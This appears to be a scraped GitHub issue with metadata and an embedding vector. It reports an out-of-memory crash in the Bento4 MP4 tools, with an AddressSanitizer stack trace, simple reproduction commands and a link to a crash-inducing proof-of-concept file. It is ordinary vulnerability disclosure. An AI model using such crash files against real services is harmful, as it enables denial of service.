AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 ==977537==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==977537==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info, mp42aac, mp42avc, mp4decrypt, mp4dump ### How to reproduce $ mp4info, mp4dump} poc-file or $ {mp42aac, mp42avc, mp4decrypt} poc-file /dev/null poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11720958/poc-file.txt)
Out-of-memory bug from AP4_DataBuffer::ReallocateBuffer() in multiple programs (v1.6.0-640)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/872/comments
2
2023-06-12T09:44:14
2024-02-17T17:35:35Z
https://github.com/axiomatic-systems/Bento4/issues/872
1,752,341,840
872
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Out-of-memory bug from AP4_DataBuffer::ReallocateBuffer() in multiple programs (v1.6.0-640) Issue date: --- start body --- Hi, Thanks for fixing the issue #741, but still there is out-of-memory bug in the latest version (1.6.0-640) of multiple programs because of the function AP4_DataBuffer::ReallocateBuffer() at Ap4DataBuffer.cpp:210. We observed the same bug in mp4info, mp42aac, mp42avc, mp4decrypt, and mp4dump with the same root cause. Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==977537==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8021ffba bytes #0 0x7fb17bc08787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x557daf86f117 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x557daf86f319 in AP4_DataBuffer::SetDataSize(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:151 #3 0x557daf8c68b2 in AP4_AudioSampleEntry::ReadFields(AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:502 #4 0x557daf8c5d98 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:108 #5 0x557daf8cc2dd in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:420 #6 0x557daf8cc3d2 in AP4_MpegAudioSampleEntry::AP4_MpegAudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:655 #7 0x557daf8cc3d2 in AP4_Mp4aSampleEntry::AP4_Mp4aSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:844 #8 0x557daf850a3b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:286 #9 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x557daf8dbac4 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x557daf8dc09b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x557daf84f9d0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x557daf872856 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x557daf872c33 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x557daf84ecf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 ==977537==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==977537==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info, mp42aac, mp42avc, mp4decrypt, mp4dump ### How to reproduce $ mp4info, mp4dump} poc-file or $ {mp42aac, mp42avc, mp4decrypt} poc-file /dev/null poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11720958/poc-file.txt) --- end body ---
7,696
[ -0.03311208263039589, 0.011558284051716328, -0.020950356498360634, 0.01411905512213707, 0.030156753957271576, 0.01040554977953434, -0.06114904582500458, 0.03642329201102257, -0.02648966759443283, 0.04409787058830261, 0.011078622192144394, 0.006015104241669178, 0.019526846706867218, 0.01739158108830452, 0.014064899645745754, -0.026164736598730087, -0.017252324149012566, 0.002206827513873577, -0.009198660962283611, 0.008966566994786263, 0.017824823036789894, -0.03701126575469971, -0.012997266836464405, 0.022915419191122055, -0.006022840738296509, 0.0131906783208251, -0.02415325492620468, -0.0027696555480360985, 0.004096460063010454, 0.009732477366924286, 0.011883215047419071, 0.03790869563817978, -0.023704538121819496, 0.03465937823057175, 0.02540656179189682, 0.014211892150342464, 0.04279814288020134, 0.053103119134902954, 0.025236358866095543, 0.03261695057153702, -0.022745216265320778, -0.04230300709605217, -0.025545818731188774, 0.015805603936314583, -0.002727105049416423, 0.021228868514299393, 0.009887206368148327, -0.006618548650294542, -0.028284527361392975, 0.0036806247662752867, 0.02724784053862095, 0.008270285092294216, -0.020795626565814018, -0.05796162039041519, 0.013337671756744385, -0.02812979929149151, 0.004641881212592125, 0.01075369119644165, -0.008131028153002262, 0.02217271737754345, -0.010297239758074284, 0.026319464668631554, 0.02737162448465824, 0.035309240221977234, 0.01858299784362316, 0.007813832722604275, -0.010374603793025017, 0.015728240832686424, -0.015364626422524452, 0.02189420536160469, -0.0396726094186306, -0.030620941892266273, -0.008734473027288914, 0.0320599265396595, 0.021956097334623337, -0.03137911483645439, 0.05307217314839363, 0.020006507635116577, -0.0333905965089798, 0.0553002767264843, -0.041467469185590744, 0.04651164636015892, -0.03862044960260391, 0.023874741047620773, 0.04165314510464668, 0.019093604758381844, -0.014985539019107819, -0.07303225994110107, -0.004630276467651129, -0.047935158014297485, 0.0032744603231549263, 0.008185183629393578, 0.03896085545420647, -0.0008795397588983178, -0.005891320761293173, 0.021522855386137962, -0.045768946409225464, -0.025050684809684753, -0.04156030714511871, -0.01896982081234455, -0.040013015270233154, -0.03763018175959587, 0.002672949805855751, 0.005017099902033806, 0.02443176694214344, 0.01280385535210371, -0.004990022163838148, -0.05161771550774574, -0.004131274297833443, 0.1349240094423294, 0.0242460910230875, -0.005844901781529188, -0.036887481808662415, -0.0006561492336913943, -0.015178950503468513, 0.006912534590810537, 0.00024128110089804977, -0.026737233623862267, -0.04827556386590004, -0.00929149892181158, -0.01049838773906231, -0.01671077124774456, -0.004289871547371149, -0.007794491946697235, -0.039239365607500076, 0.048120833933353424, -0.005608939565718174, -0.003257053205743432, -0.01510158646851778, -0.01602996326982975, -0.03995112329721451, -0.014931383542716503, -0.00545034185051918, -0.045985568314790726, -0.0011923832353204489, -0.01197605300694704, -0.01582881435751915, 0.06647173315286636, -0.0002516769745852798, 0.009299234487116337, -0.05508365482091904, -0.03821815177798271, 0.03301924839615822, 0.005806219298392534, -0.027913177385926247, -0.012424767948687077, -0.0031584131065756083, 0.027789393439888954, -0.025576764717698097, -0.004947471432387829, -0.017468946054577827, -0.01807239092886448, 0.019805358722805977, 0.03911558538675308, 0.026891963556408882, -0.005953212268650532, -0.0012533079134300351, 0.049977585673332214, -0.014088109135627747, 0.0006000598077662289, -0.008626162074506283, -0.02099677547812462, -0.006216252222657204, -0.03719693794846535, -0.00019316993711981922, -0.03077567182481289, 0.008270285092294216, 0.007283885031938553, 0.0018760935636237264, 0.022017989307641983, -0.008982039988040924, -0.004394313786178827, 0.009840787388384342, 0.02512804977595806, -0.04230300709605217, -0.025870749726891518, 0.014629662036895752, 0.05557878687977791, -0.021166976541280746, 0.0039359284564852715, 0.006216252222657204, 0.00508285965770483, 0.03651612997055054, 0.018613941967487335, 0.042364899069070816, -0.012339667417109013, 0.011697540059685707, -0.051370151340961456, 0.02941405214369297, 0.0022822581231594086, 0.03354532644152641, 0.010467441752552986, -0.013453718274831772, -0.007628157734870911, 0.02842378430068493, 0.0037928035017102957, -0.03605194389820099, -0.029352160170674324, 0.011937370523810387, 0.010954839177429676, -0.008982039988040924, -0.034937892109155655, -0.030806617811322212, 0.014985539019107819, -0.03178141266107559, 0.010049672797322273, -0.030450738966464996, 0.03478316217660904, 0.030342428013682365, -0.0027213026769459248, -0.025236358866095543, -0.02033143863081932, 0.0168964471668005, -0.019031712785363197, -0.02766561135649681, -0.000531882222276181, -0.022064408287405968, 0.01158149354159832, -0.005179565399885178, -0.018691306933760643, 0.013654866255819798, 0.009732477366924286, 0.029971078038215637, -0.03979639336466789, -0.007922143675386906, -0.005059650167822838, -0.007403800264000893, 0.02031596563756466, -0.0008437585784122348, 0.0045877257362008095, 0.050875015556812286, 0.01702023111283779, -0.02795959636569023, -0.02404494397342205, 0.01728327013552189, 0.009020722471177578, 0.0006721056997776031, 0.00019993935711681843, 0.017066648229956627, 0.021863259375095367, -0.014003007672727108, 0.03404046222567558, -0.023874741047620773, -0.019480427727103233, 0.019882723689079285, 0.06900929659605026, -0.021847786381840706, -0.001529886620119214, 0.0072413343004882336, 0.01974346674978733, 0.003139072097837925, -0.0029243850149214268, 0.0034968836698681116, -0.009585483931005001, 0.014010744169354439, -0.005628280807286501, 0.056228652596473694, 0.008463696576654911, -0.049575287848711014, -0.027000274509191513, 0.010490651242434978, -0.02160022035241127, -0.022729743272066116, -0.0026555426884442568, 0.0003075246058870107, -0.011272034607827663, 0.0013326066546142101, 0.02305467613041401, -0.017902188003063202, -0.009492646902799606, 0.019000766798853874, -0.005647622048854828, -0.017824823036789894, -0.037661127746105194, -0.02754182741045952, 0.009306970983743668, 0.01582881435751915, 0.012788382358849049, 0.027913177385926247, -0.010289503261446953, 0.01016571931540966, 0.032895464450120926, -0.011171460151672363, 0.03274073451757431, 0.019511373713612556, 0.010521597228944302, -0.003698031883686781, -0.03164215385913849, 0.009361126460134983, -0.01661793328821659, 0.0056244125589728355, 0.011651121079921722, -0.02970803901553154, 0.005659226793795824, 0.0038662999868392944, 0.00932244397699833, -0.01304368581622839, 0.01867583394050598, -0.0349997840821743, -0.014474932104349136, -0.030048443004488945, -0.01954231970012188, 0.006061522755771875, -0.020052926614880562, -0.02443176694214344, 0.014443986117839813, -0.03048168495297432, -0.012146255001425743, -0.00016282848082482815, -0.017066648229956627, 0.04224111884832382, -0.059075672179460526, -0.01579013094305992, -0.014707026071846485, -0.024601969867944717, -0.01206115446984768, 0.0028547567781060934, -0.022605961188673973, -0.05059650167822838, 0.015271788462996483, -0.0426124669611454, 0.023905687034130096, -0.03586626797914505, 0.04066287726163864, 0.038744233548641205, -0.015712767839431763, -0.004734718706458807, 0.0642436295747757, -0.04564516246318817, 0.023766430094838142, -0.0012397690443322062, -0.011032204143702984, 0.0019089735578745604, -0.030218645930290222, 0.021445490419864655, -0.03911558538675308, -0.018691306933760643, 0.004088723566383123, -0.00023294021957553923, 0.010629907250404358, -0.020300492644309998, 0.009840787388384342, -0.0009085515048354864, -0.023472445085644722, -0.016571514308452606, 0.0067926193587481976, 0.005914530251175165, -0.002113990020006895, -0.005856506526470184, 0.0029050437733531, 0.0012001196155324578, 0.013500137254595757, 0.02540656179189682, 0.0354020781815052, 0.014072636142373085, -0.028702298179268837, -0.014327939599752426, -0.0004721663426607847, 0.015264051966369152, -0.01992914266884327, 0.008254812099039555, -0.03964166343212128, -0.015225369483232498, 0.01866036094725132, 0.008525588549673557, 0.014451722614467144, -0.001063764444552362, 0.025870749726891518, 0.005268535111099482, -0.030017497017979622, -0.01148865558207035, 0.049018263816833496, -0.03438086435198784, 0.04094139114022255, -0.006289748940616846, -0.00967832189053297, 0.03803247958421707, 0.007655235473066568, -0.03735166788101196, 0.0075546614825725555, -0.004970680922269821, 0.010544806718826294, 0.02259048819541931, -0.038651395589113235, 0.037970587611198425, 0.0148617560043931, -0.023379607126116753, 0.04350989684462547, -0.011921897530555725, 0.00671525439247489, -0.04679016023874283, 0.03058999590575695, -0.032678842544555664, -0.06869983673095703, -0.02901175618171692, 0.04592367634177208, -0.009732477366924286, -0.04282908886671066, -0.01698928512632847, -0.061706069856882095, 0.03595910593867302, 0.009600956924259663, 0.033452488481998444, -0.0065179746598005295, 0.013515610247850418, 0.04641880840063095, 0.0166952982544899, -0.023859268054366112, 0.01729874312877655, -0.006951216608285904, 0.028207164257764816, 0.009221870452165604, -0.022342920303344727, 0.009392072446644306, 0.03404046222567558, 0.04156030714511871, -0.0032338437158614397, 0.0028334814123809338, -0.019789885729551315, 0.03555680811405182, -0.024292510002851486, 0.0004808698722627014, -0.013237097300589085, 0.01797955296933651, 0.02601000666618347, -0.01089294720441103, -0.009453964419662952, 0.0022551806177943945, -0.011047677136957645, -0.048337455838918686, 0.004371104761958122, 0.021646637469530106, 0.0005899057141505182, 0.019758939743041992, 0.004788873717188835, -0.02307014912366867, -0.02382832206785679, -0.026226626709103584, -0.019913669675588608, -0.028702298179268837, -0.019975561648607254, 0.03397857025265694, -0.025437507778406143, -0.006796487607061863, 0.01974346674978733, -0.06145850569009781, -0.026025479659438133, -0.03193614259362221, 0.013229360803961754, -0.024478185921907425, 0.008858256042003632, 0.02853209525346756, 0.0011614373652264476, 0.008564270101487637, 0.011929634027183056, -0.007802228443324566, 0.0006653362652286887, -0.010188928805291653, 0.0388680174946785, 0.025839803740382195, -0.000027047419280279428, -0.0004985186969861388, 0.017360635101795197, -0.0016401312313973904, 0.01884603686630726, 0.033173974603414536, -0.02257501520216465, -0.01955779269337654, 0.016169218346476555, -0.033669110387563705, -0.009059404022991657, 0.02268332429230213, 0.009964571334421635, -0.00042260458576492965, 0.004773401189595461, 0.013972061686217785, -0.0007823503692634404, -0.03400951623916626, 0.005075123161077499, -0.06018972396850586, -0.017035704106092453, -0.0363304540514946, -0.027046693488955498, 0.02129076048731804, -0.004552911501377821, 0.005636017303913832, -0.03524734824895859, 0.025143522769212723, 0.026071898639202118, 0.0010018727043643594, 0.006351640447974205, 0.00933791697025299, -0.001362585462629795, -0.015705030411481857, 0.000625203363597393, 0.024895954877138138, -0.029042702168226242, -0.012177200987935066, 0.02969256602227688, 0.03862044960260391, -0.0017987288301810622, -0.03534018620848656, 0.01123335212469101, -0.00932244397699833, 0.01904718577861786, -0.03134816884994507, -0.01982083171606064, 0.03422613441944122, -0.025685075670480728, -0.04409787058830261, 0.0032241730950772762, -0.011101831682026386, 0.006989899091422558, -0.015256315469741821, -0.024091362953186035, -0.04202449694275856, 0.00011441511014709249, -0.01051386073231697, 0.024075889959931374, 0.014235101640224457, -0.018629414960741997, -0.004491019994020462, -0.007929880172014236, 0.0082161296159029, -0.011991526000201702, 0.00035273461253382266, 0.03957977145910263, -0.006746200378984213, 0.04369557276368141, -0.01926380582153797, -0.004808214958757162, 0.016648879274725914, -0.0013471125857904553, 0.022342920303344727, -0.01246345043182373, -0.007705522235482931, 0.017902188003063202, 0.02138359844684601, -0.0020733734127134085, -0.012254565954208374, -0.004080987069755793, 0.040786661207675934, -0.016757190227508545, 0.012285511940717697, -0.03995112329721451, 0.029058175161480904, 0.004870106931775808, 0.03230749070644379, 0.01040554977953434, 0.002442789962515235, 0.003736714133992791, -0.006568261422216892, 0.016478678211569786, 0.025932641699910164, 0.012440240941941738, 0.0015588983660563827, -0.0021720135118812323, 0.003649679012596607, 0.007999508641660213, 0.03168857470154762, 0.005562520585954189, 0.015604456886649132, 0.0028218769002705812, -0.007318699266761541, -0.004730850458145142, 0.00027077639242634177, 0.01206115446984768, 0.003363429568707943, -0.02011481672525406, -0.010274030268192291, 0.005771405529230833, -0.00903619546443224, 0.031208913773298264, -0.031998034566640854, -0.009616429917514324, 0.029058175161480904, -0.01876867190003395, -0.0013529148418456316, -0.022930892184376717, -0.04097233712673187, 0.027201423421502113, -0.03410235419869423, 0.00024684169329702854, 0.013801859691739082, 0.003976544830948114, -0.018985293805599213, -0.009546802379190922, -0.0011933502973988652, 0.0008983974112197757, -0.025174468755722046, -0.021043194457888603, 0.0015173148130998015, -0.02307014912366867, -0.024168727919459343, 0.0125562883913517, -0.01568182185292244, 0.009747950360178947, -0.00041075810440815985, 0.02715500444173813, 0.009415281936526299, -0.009593220427632332, 0.027975069358944893, 0.0042743985541164875, -0.034442756325006485, -0.033669110387563705, 0.03348343446850777, 0.012486659921705723, 0.01886150985956192, -0.029352160170674324, 0.026628924533724785, 0.018521105870604515, 0.01534915342926979, 0.05406244099140167, 0.009631902910768986, 0.020764680579304695, 0.0022764557506889105, 0.045490432530641556, 0.0033963096793740988, -0.00929149892181158, 0.029940132051706314, 0.010800110176205635, -0.04709962010383606, 0.01748441904783249, -0.02395210601389408, 0.005744327791035175, 0.008719000034034252, 0.006514106411486864, -0.010730481706559658, 0.0024079757276922464, -0.015333680436015129, -0.03772301971912384, 0.038063425570726395, -0.006150492466986179, -0.029924659058451653, -0.022915419191122055, 0.009252816438674927, 0.027990542352199554, -0.007577870506793261, -0.005786878522485495, -0.006889325100928545, 0.0027947991620749235, -0.004734718706458807, -0.017530838027596474, 0.022605961188673973, -0.01982083171606064, 0.017654620110988617, 0.009709267877042294, 0.005164092406630516, 0.031812358647584915, 0.004394313786178827, -0.04230300709605217, 0.006026708986610174, -0.007384459022432566, 0.016478678211569786, -0.01368581224232912, -0.0002086428867187351, 0.04385030269622803, 0.037382613867521286, 0.006243329960852861, 0.0018403123831376433, -0.018923401832580566, -0.005926134530454874, -0.019279278814792633, 0.0034640037920325994, 0.020981302484869957, -0.019975561648607254, -0.041776929050683975, 0.0015086113708093762, 0.02990918606519699, 0.017840296030044556, 0.0040306998416781425, -0.03077567182481289, 0.0033808366861194372, 0.021430017426609993, -0.01582881435751915, -0.016865501180291176, 0.018118808045983315, 0.01915549486875534, -0.017964079976081848, -0.0032957354560494423, 0.009995517320930958, -0.008541060611605644, -0.016726244240999222, 0.014250574633479118, -0.03469032421708107, 0.008688054047524929, -0.02812979929149151, 0.010181192308664322, 0.002684554550796747, -0.03574248403310776, 0.03329775854945183, -0.014970066025853157, 0.04350989684462547, 0.02404494397342205, -0.0028122062794864178, -0.031719520688056946, 0.02433892898261547, -0.005968685261905193, -0.00562054431065917, -0.012092100456357002, -0.024663861840963364, 0.012641388922929764, 0.0024021733552217484, -0.023812849074602127, 0.013670339249074459, 0.027882231399416924, -0.004084855318069458, 0.004541306756436825, 0.03741355985403061, 0.003558775410056114, -0.02443176694214344, 0.006135019473731518, -0.029831821098923683, 0.0196351557970047, 0.009717004373669624, 0.007125287316739559, -0.0016865500947460532, -0.017329689115285873, 0.01602996326982975, -0.010916156694293022, 0.0012426702305674553, -0.005241457372903824, -0.01630847528576851, -0.04075571522116661, -0.0034523990470916033, -0.006436741445213556, 0.005380713846534491, -0.0006759739480912685, 0.015395572409033775, 0.004096460063010454, -0.031502898782491684, -0.02413778193295002, -0.017422527074813843, 0.011295244097709656, -0.03342154249548912, 0.0026690815575420856, -0.0003077663714066148, 0.010003253817558289, 0.012741963379085064, 0.03314302861690521, 0.0017726182704791427, 0.012324194423854351, 0.0034388601779937744, -0.033359650522470474, -0.0030926531180739403, -0.007434746250510216, 0.012974057346582413, 0.021058667451143265, -0.026071898639202118, 0.025360142812132835, 0.000015880914361332543, 0.010684062726795673, -0.0009656079346314073, -0.03741355985403061, -0.012873482890427113, -0.004065514076501131, 0.028377365320920944, -0.00046999045298434794, 0.007535320241004229, 0.0023963709827512503, 0.00550062907859683, -0.022544069215655327, -0.012022471986711025, 0.023410553112626076, 0.005678567569702864, -0.024369874969124794, 0.011821324005723, -0.03280262649059296, 0.01777840405702591, -0.008773155510425568, 0.01768556609749794, -0.026752706617116928, -0.035711538046598434, -0.01026629377156496, 0.045397594571113586, -0.014041690155863762, -0.020671842619776726, 0.023008257150650024, 0.001389663084410131, 0.029151013121008873, -0.03781585767865181, 0.029847294092178345, -0.020501641556620598, 0.013747704215347767, 0.021956097334623337, -0.004997758660465479, 0.0117207495495677, -0.018443740904331207, 0.008339912630617619, 0.000331701070535928, -0.0033537589479237795, -0.0034253213088959455, 0.052700821310281754, -0.023689065128564835, -0.0033672978170216084, -0.03809437155723572, 0.006340035703033209, -0.017267797142267227, -0.0367327518761158, -0.013012739829719067, -0.013082368299365044, 0.02316298708319664, -0.008711263537406921, -0.008773155510425568, -0.016679825261235237, -0.025483926758170128, 0.01740705408155918, 0.020671842619776726, -0.035030730068683624, 0.018149754032492638, -0.013097841292619705, 0.01650962419807911, 0.017917660996317863, 0.011991526000201702, 0.03305019438266754, -0.038341935724020004, -0.00023209405480884016, -0.014583243057131767, 0.016571514308452606, 0.03058999590575695, -0.018428267911076546, 0.012262302450835705, -0.002239707624539733, -0.03858950361609459, 0.032586004585027695, -0.005562520585954189, 0.025638656690716743, 0.010212138295173645, 0.029383106157183647, 0.0215073823928833, -0.0251125767827034, -0.004262794274836779, 0.0021700793877243996, 0.016834555193781853, -0.00684290612116456, 0.03778491169214249, 0.0002507099125068635, -0.007608816493302584, -0.02737162448465824, 0.07160875201225281, -0.030079388990998268, -0.01090068370103836, -0.03608288988471031, -0.01279611885547638, -0.010722745209932327, -0.038434773683547974, 0.0029727378860116005, -0.027882231399416924, -0.007469560019671917, 0.011960580013692379, 0.026922909542918205, -0.00918318796902895, 0.00011387114500394091, 0.015573510900139809, -0.007589475251734257, -0.008285757154226303, -0.007434746250510216, -0.011759432032704353, -0.0030984554905444384, 0.00035273461253382266, 0.029383106157183647, 0.011008994653820992, -0.01954231970012188, -0.010800110176205635, 0.003171951975673437, -0.0029398580081760883, -0.006858379114419222, -0.04214828088879585, -0.01163564808666706, -0.013654866255819798, 0.00550062907859683, -0.01748441904783249, 0.017623674124479294, -0.009546802379190922, -0.03441181033849716, -0.012687807902693748, 0.014281520619988441, 0.015813341364264488, 0.014939120039343834, 0.04165314510464668, 0.009500383399426937, 0.020052926614880562, 0.00006805674638599157, 0.013507873751223087, 0.03877517953515053, -0.04282908886671066, 0.008579743094742298, -0.006467687431722879, -0.04536664858460426, -0.00884278304874897, -0.01211530901491642, 0.018598468974232674, 